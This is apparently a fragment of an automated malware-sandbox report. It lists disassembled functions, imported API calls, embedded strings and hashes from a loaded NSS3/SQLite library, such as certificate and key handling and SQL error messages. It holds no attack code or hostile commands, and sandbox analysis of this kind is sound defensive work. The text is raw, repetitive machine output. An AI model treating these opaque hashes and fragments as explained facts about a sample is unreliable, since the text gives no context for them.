                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _byteswap_ulong$sqlite3_log
                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                      • API String ID: 2597148001-598938438
                                                                                                                                                                                                                                                      • Opcode ID: 4e22fd8518e754b649f4b143a3675a4a312cbb3ab5959f98efe6f6a3d6b54b82
                                                                                                                                                                                                                                                      • Instruction ID: 85ebc5645fe9e8d22e758b1a974933a6cf8439fb38406ab36c9365d042f9e2dc
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4e22fd8518e754b649f4b143a3675a4a312cbb3ab5959f98efe6f6a3d6b54b82
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7F829C75B40215CFCB04CF69C480F9ABBB2BF99358F2591A8D905ABB51E731EC42CB91
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_ArenaMark_Util.NSS3(?), ref: 6C4DACC4
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,000040F4), ref: 6C4DACD5
                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,000040F4), ref: 6C4DACF3
                                                                                                                                                                                                                                                      • SEC_ASN1EncodeInteger_Util.NSS3(?,00000018,00000003), ref: 6C4DAD3B
                                                                                                                                                                                                                                                      • SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6C4DADC8
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C4DADDF
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C4DADF0
                                                                                                                                                                                                                                                        • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C4DB06A
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C4DB08C
                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C4DB1BA
                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C4DB27C
                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,00002010), ref: 6C4DB2CA
                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C4DB3C1
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C4DB40C
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$Error$Arena_Free$ArenaItem_memset$Alloc_CopyEncodeInteger_Mark_ValueZfree
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1285963562-0
                                                                                                                                                                                                                                                      • Opcode ID: e006eef8e4eca0f3b98ee6127328d5f3a2c7fc41dbd0bc686811982adcb2c3ce
                                                                                                                                                                                                                                                      • Instruction ID: 3c7879ab5c02910b5b40b93fec9718ec6afcaea9f7c0994789f7d05137e82106
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e006eef8e4eca0f3b98ee6127328d5f3a2c7fc41dbd0bc686811982adcb2c3ce
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C022BE71A04300AFE700EF14CC55F9A77E1AF8430CF25856CE8595B7A2E772E859CB96
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C4225F3
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • '%s' is not a function, xrefs: 6C422FD2
                                                                                                                                                                                                                                                      • no such table: %s, xrefs: 6C4226AC
                                                                                                                                                                                                                                                      • cannot have both ON and USING clauses in the same join, xrefs: 6C4232B5
                                                                                                                                                                                                                                                      • unsafe use of virtual table "%s", xrefs: 6C4230D1
                                                                                                                                                                                                                                                      • multiple recursive references: %s, xrefs: 6C4222E0
                                                                                                                                                                                                                                                      • no tables specified, xrefs: 6C4226BE
                                                                                                                                                                                                                                                      • H, xrefs: 6C42329F
                                                                                                                                                                                                                                                      • H, xrefs: 6C42322D
                                                                                                                                                                                                                                                      • no such index: "%s", xrefs: 6C42319D
                                                                                                                                                                                                                                                      • %s.%s.%s, xrefs: 6C42302D
                                                                                                                                                                                                                                                      • a NATURAL join may not have an ON or USING clause, xrefs: 6C4232C1
                                                                                                                                                                                                                                                      • too many references to "%s": max 65535, xrefs: 6C422FB6
                                                                                                                                                                                                                                                      • cannot join using column %s - column not present in both tables, xrefs: 6C4232AB
                                                                                                                                                                                                                                                      • recursive reference in a subquery: %s, xrefs: 6C4222E5
                                                                                                                                                                                                                                                      • too many columns in result set, xrefs: 6C423012
                                                                                                                                                                                                                                                      • table %s has %d values for %d columns, xrefs: 6C42316C
                                                                                                                                                                                                                                                      • %s.%s, xrefs: 6C422D68
                                                                                                                                                                                                                                                      • access to view "%s" prohibited, xrefs: 6C422F4A
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                                                      • String ID: %s.%s$%s.%s.%s$'%s' is not a function$H$H$a NATURAL join may not have an ON or USING clause$access to view "%s" prohibited$cannot have both ON and USING clauses in the same join$cannot join using column %s - column not present in both tables$multiple recursive references: %s$no such index: "%s"$no such table: %s$no tables specified$recursive reference in a subquery: %s$table %s has %d values for %d columns$too many columns in result set$too many references to "%s": max 65535$unsafe use of virtual table "%s"
                                                                                                                                                                                                                                                      • API String ID: 3510742995-3400015513
                                                                                                                                                                                                                                                      • Opcode ID: dfbb6cb7bfce673a14458ee51b07af61acdb06a392534ec69f5b27ad91f17c08
                                                                                                                                                                                                                                                      • Instruction ID: 0df73f0f68d14d4ffff84c62cb68cf6dfc465f22f528f58ae12982e691c99c92
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dfbb6cb7bfce673a14458ee51b07af61acdb06a392534ec69f5b27ad91f17c08
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 04D2AF70E14209CFDB24CF95C485F9DBBB1FF49328F288169D855ABB51DB39A842CB90
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • sqlite3_initialize.NSS3 ref: 6C45ED38
                                                                                                                                                                                                                                                        • Part of subcall function 6C3F4F60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C3F4FC4
                                                                                                                                                                                                                                                      • sqlite3_mprintf.NSS3(snippet), ref: 6C45EF3C
                                                                                                                                                                                                                                                      • sqlite3_mprintf.NSS3(offsets), ref: 6C45EFE4
                                                                                                                                                                                                                                                        • Part of subcall function 6C51DFC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000003,?,6C3F5001,?,00000003,00000000), ref: 6C51DFD7
                                                                                                                                                                                                                                                      • sqlite3_mprintf.NSS3(matchinfo), ref: 6C45F087
                                                                                                                                                                                                                                                      • sqlite3_mprintf.NSS3(matchinfo), ref: 6C45F129
                                                                                                                                                                                                                                                      • sqlite3_mprintf.NSS3(optimize), ref: 6C45F1D1
                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(?), ref: 6C45F368
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: sqlite3_mprintf$strlen$sqlite3_freesqlite3_initialize
                                                                                                                                                                                                                                                      • String ID: fts3$fts3_tokenizer$fts3tokenize$fts4$fts4aux$matchinfo$offsets$optimize$porter$simple$snippet$unicode61
                                                                                                                                                                                                                                                      • API String ID: 2518200370-449611708
                                                                                                                                                                                                                                                      • Opcode ID: 054a2908f7ce6e0132ddeca95b9e5126695c27f784df0f7a33c09236be0c55f1
                                                                                                                                                                                                                                                      • Instruction ID: 1932adc27df13985bd953630774d69a444771f04c9ecd4b27cd453ee63896bbe
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 054a2908f7ce6e0132ddeca95b9e5126695c27f784df0f7a33c09236be0c55f1
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B02EEB1B057014BF704DF619C85F2B36B2BBC5208F54893CD85A97B40EB79E9668B83
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C4D7C33
                                                                                                                                                                                                                                                      • NSS_OptionGet.NSS3(0000000C,00000000), ref: 6C4D7C66
                                                                                                                                                                                                                                                      • CERT_DestroyCertificate.NSS3(00000000), ref: 6C4D7D1E
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D7870: SECOID_FindOID_Util.NSS3(?,?,?,6C4D91C5), ref: 6C4D788F
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C4D7D48
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE067,00000000), ref: 6C4D7D71
                                                                                                                                                                                                                                                      • SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C4D7DD3
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C4D7DE1
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C4D7DF8
                                                                                                                                                                                                                                                      • SECKEY_DestroyPublicKey.NSS3(?), ref: 6C4D7E1A
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE067,00000000), ref: 6C4D7E58
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D7870: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C4D91C5), ref: 6C4D78BB
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D7870: PORT_ZAlloc_Util.NSS3(0000000C,?,?,?,6C4D91C5), ref: 6C4D78FA
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D7870: strchr.VCRUNTIME140(?,0000003A,?,?,?,?,?,?,?,?,?,?,6C4D91C5), ref: 6C4D7930
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D7870: PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C4D91C5), ref: 6C4D7951
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D7870: memcpy.VCRUNTIME140(00000000,?,?), ref: 6C4D7964
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D7870: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C4D797A
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D7870: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 6C4D7988
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D7870: memcpy.VCRUNTIME140(?,00000001,00000001), ref: 6C4D7998
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D7870: free.MOZGLUE(00000000), ref: 6C4D79A7
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D7870: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,6C4D91C5), ref: 6C4D79BB
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D7870: PR_GetCurrentThread.NSS3(?,?,?,?,6C4D91C5), ref: 6C4D79CA
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C4D7E49
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C4D7F8C
                                                                                                                                                                                                                                                      • SECKEY_DestroyPublicKey.NSS3(?), ref: 6C4D7F98
                                                                                                                                                                                                                                                      • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C4D7FBF
                                                                                                                                                                                                                                                      • SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C4D7FD9
                                                                                                                                                                                                                                                      • PK11_ImportEncryptedPrivateKeyInfoAndReturnKey.NSS3(?,00000000,?,?,?,00000001,00000001,?,?,00000000,?), ref: 6C4D8038
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6C4D8050
                                                                                                                                                                                                                                                      • PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6C4D8093
                                                                                                                                                                                                                                                      • SECOID_FindOID_Util.NSS3 ref: 6C4D7F29
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C478298,?,?,?,6C46FCE5,?), ref: 6C4D07BF
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C4D07E6
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4D081B
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4D0825
                                                                                                                                                                                                                                                      • SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C4D8072
                                                                                                                                                                                                                                                      • SECOID_FindOID_Util.NSS3 ref: 6C4D80F5
                                                                                                                                                                                                                                                        • Part of subcall function 6C4DBC10: SECITEM_CopyItem_Util.NSS3(?,?,?,?,-00000001,?,6C4D800A,00000000,?,00000000,?), ref: 6C4DBC3F
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$Item_$Error$Zfree$DestroyPublic$Find$Alloc_CopyHashImportK11_LookupTablememcpy$AlgorithmCertificateConstCurrentEncryptedInfoOptionPrivateReturnTag_Threadfreestrchrstrcmpstrlen
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2815116071-0
                                                                                                                                                                                                                                                      • Opcode ID: 529d4b8f5aaafb1214ffb1661fa1b24f15336bd7d13b7941cd53fdf6c6c6791d
                                                                                                                                                                                                                                                      • Instruction ID: 612b983522e8243ac1a4131cbb06d60ed35fa1bbffc70fcaafc7fc15a2282a88
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 529d4b8f5aaafb1214ffb1661fa1b24f15336bd7d13b7941cd53fdf6c6c6791d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E3E1C2706093019FE710EF28D890F6AB7E5AF44709F12492DE8899BB55E732FC05CB92
APIs
• GetCurrentProcess.KERNEL32 ref: 6C461C6B
• OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 6C461C75
• GetTokenInformation.ADVAPI32(00000400,00000004,?,00000400,?), ref: 6C461CA1
• GetLengthSid.ADVAPI32(?), ref: 6C461CA9
• malloc.MOZGLUE(00000000), ref: 6C461CB4
• CopySid.ADVAPI32(00000000,00000000,?), ref: 6C461CCC
• GetTokenInformation.ADVAPI32(?,00000005(TokenIntegrityLevel),?,00000400,?), ref: 6C461CE4
• GetLengthSid.ADVAPI32(?), ref: 6C461CEC
• malloc.MOZGLUE(00000000), ref: 6C461CFD
• CopySid.ADVAPI32(00000000,00000000,?), ref: 6C461D0F
• CloseHandle.KERNEL32(?), ref: 6C461D17
• AllocateAndInitializeSid.ADVAPI32 ref: 6C461D4D
• GetLastError.KERNEL32 ref: 6C461D73
• PR_LogPrint.NSS3(_PR_NT_InitSids: OpenProcessToken() failed. Error: %d,00000000), ref: 6C461D7F
Strings
• _PR_NT_InitSids: OpenProcessToken() failed. Error: %d, xrefs: 6C461D7A
Memory Dump Source
• Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
Similarity
• API ID: Token$CopyInformationLengthProcessmalloc$AllocateCloseCurrentErrorHandleInitializeLastOpenPrint
• String ID: _PR_NT_InitSids: OpenProcessToken() failed. Error: %d
• API String ID: 3748115541-1216436346
• Opcode ID: 3e8305179aed0449193628a49959adf63202d0607b103ad970aa1416d67ef101
• Instruction ID: 6755391e972279a1cfe59d7bdfba78a1f0c7282783b67a1b42084e011ac87112
• Opcode Fuzzy Hash: 3e8305179aed0449193628a49959adf63202d0607b103ad970aa1416d67ef101
• Instruction Fuzzy Hash: 723157B1A01618AFDF10EF64CC48BAA7BB8FF4A345F014169F60992650E7306E94CF6D
APIs
• __aulldiv.LIBCMT ref: 6C463DFB
• __allrem.LIBCMT ref: 6C463EEC
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C463FA3
• memcpy.VCRUNTIME140(?,?,00000001), ref: 6C464047
• memcpy.VCRUNTIME140(?,?,00000000), ref: 6C4640DE
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C46415F
• __allrem.LIBCMT ref: 6C46416B
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C464288
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C4642AB
• __allrem.LIBCMT ref: 6C4642B7
Strings
Memory Dump Source
• Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem$memcpy$__aulldiv
• String ID: %02d$%03d$%04d$%lld
• API String ID: 703928654-3678606288
• Opcode ID: a42e878d35b84fba7fd384698cbebc13caf4d9880f7e5952ce197ea5304d6040
• Instruction ID: 0ab4c33ba4f61d1b18f0ea017116dea77a61f14442b42f3a18eb332985034b73
• Opcode Fuzzy Hash: a42e878d35b84fba7fd384698cbebc13caf4d9880f7e5952ce197ea5304d6040
• Instruction Fuzzy Hash: 34F12271A087809FDB15CF39C850F6BB7F6AF86348F148A1DE48597B55E730D8868B42
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C46EF63
                                                                                                                                                                                                                                                        • Part of subcall function 6C4787D0: PORT_NewArena_Util.NSS3(00000800,6C46EF74,00000000), ref: 6C4787E8
                                                                                                                                                                                                                                                        • Part of subcall function 6C4787D0: PORT_ArenaAlloc_Util.NSS3(00000000,00000008,?,6C46EF74,00000000), ref: 6C4787FD
                                                                                                                                                                                                                                                        • Part of subcall function 6C4787D0: PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6C47884C
                                                                                                                                                                                                                                                      • PL_strncasecmp.NSS3(oid.,?,00000004), ref: 6C46F2D4
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C46F2FC
                                                                                                                                                                                                                                                      • SEC_StringToOID.NSS3(?,?,?,00000000), ref: 6C46F30F
                                                                                                                                                                                                                                                      • SECITEM_AllocItem_Util.NSS3(?,00000000,-00000002), ref: 6C46F374
                                                                                                                                                                                                                                                      • PL_strcasecmp.NSS3(6C5B2FD4,?), ref: 6C46F457
                                                                                                                                                                                                                                                      • SECOID_FindOIDByTag_Util.NSS3(00000029), ref: 6C46F4D2
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6C46F66E
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE007,00000000), ref: 6C46F67D
                                                                                                                                                                                                                                                      • CERT_DestroyName.NSS3(?), ref: 6C46F68B
                                                                                                                                                                                                                                                        • Part of subcall function 6C478320: PORT_ArenaAlloc_Util.NSS3(0000002A,00000018), ref: 6C478338
                                                                                                                                                                                                                                                        • Part of subcall function 6C478320: SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C478364
                                                                                                                                                                                                                                                        • Part of subcall function 6C478320: PORT_ArenaAlloc_Util.NSS3(0000002A,?), ref: 6C47838E
                                                                                                                                                                                                                                                        • Part of subcall function 6C478320: memcpy.VCRUNTIME140(00000000,?,?), ref: 6C4783A5
                                                                                                                                                                                                                                                        • Part of subcall function 6C478320: PR_SetError.NSS3(FFFFE005,00000000), ref: 6C4783E3
                                                                                                                                                                                                                                                        • Part of subcall function 6C4784C0: PORT_ArenaAlloc_Util.NSS3(00000000,00000004,00000000,00000000), ref: 6C4784D9
                                                                                                                                                                                                                                                        • Part of subcall function 6C4784C0: PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6C478528
                                                                                                                                                                                                                                                        • Part of subcall function 6C478900: PORT_ArenaGrow_Util.NSS3(00000000,?,00000000,?,00000000,?,00000000,?,6C46F599,?,00000000), ref: 6C478955
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$Arena$Alloc_$ErrorFindItem_Tag_strlen$AllocArena_DestroyGrow_L_strcasecmpL_strncasecmpNameStringZfreememcpy
                                                                                                                                                                                                                                                      • String ID: "$*$oid.
                                                                                                                                                                                                                                                      • API String ID: 4161946812-2398207183
                                                                                                                                                                                                                                                      • Opcode ID: 9c98528fcc0ce187202d06441a4a1b65aa46c43aba212d731bb7403929fbc486
                                                                                                                                                                                                                                                      • Instruction ID: f286c6349870113f842c2b74314245c34adc8407fc8e868226c4de6770728951
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9c98528fcc0ce187202d06441a4a1b65aa46c43aba212d731bb7403929fbc486
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0E225B7160E3404BF710CE1AC890F6AB7E6AB85359F18462EE4D587F99E7319C06CB83
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C411D58
                                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C411EFD
                                                                                                                                                                                                                                                      • sqlite3_exec.NSS3(00000000,00000000,Function_00007370,?,00000000), ref: 6C411FB7
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • abort due to ROLLBACK, xrefs: 6C412223
                                                                                                                                                                                                                                                      • another row available, xrefs: 6C412287
                                                                                                                                                                                                                                                      • SELECT*FROM"%w".%s ORDER BY rowid, xrefs: 6C411F83
                                                                                                                                                                                                                                                      • attached databases must use the same text encoding as main database, xrefs: 6C4120CA
                                                                                                                                                                                                                                                      • unsupported file format, xrefs: 6C412188
                                                                                                                                                                                                                                                      • sqlite_temp_master, xrefs: 6C411C5C
                                                                                                                                                                                                                                                      • no more rows available, xrefs: 6C412264
                                                                                                                                                                                                                                                      • sqlite_master, xrefs: 6C411C61
                                                                                                                                                                                                                                                      • unknown error, xrefs: 6C412291
                                                                                                                                                                                                                                                      • table, xrefs: 6C411C8B
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_byteswap_ulongsqlite3_exec
                                                                                                                                                                                                                                                      • String ID: SELECT*FROM"%w".%s ORDER BY rowid$abort due to ROLLBACK$another row available$attached databases must use the same text encoding as main database$no more rows available$sqlite_master$sqlite_temp_master$table$unknown error$unsupported file format
                                                                                                                                                                                                                                                      • API String ID: 563213449-2102270813
                                                                                                                                                                                                                                                      • Opcode ID: 21cbc5729982ada99b85cb3d0da024b092a14dd218a86b1599ff2efa3dc999b2
                                                                                                                                                                                                                                                      • Instruction ID: 85cefe7e81ad521ceca978931e28bc61dff3568743bf4eb5df4e8c4cadc03005
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 21cbc5729982ada99b85cb3d0da024b092a14dd218a86b1599ff2efa3dc999b2
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DC12AD7060C3418FD714CF19C484E6ABBF2AF86318F188A5DD9D99BB51DB31E846CB82
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: -$-$2$BINARY$NOCASE$ON clause references tables to its right$sub-select returns %d columns - expected %d$u
                                                                                                                                                                                                                                                      • API String ID: 0-3593521594
                                                                                                                                                                                                                                                      • Opcode ID: 5444aae386b1c1956ca4bbce291b7c08c32af9fd46b49573d675359827723eb8
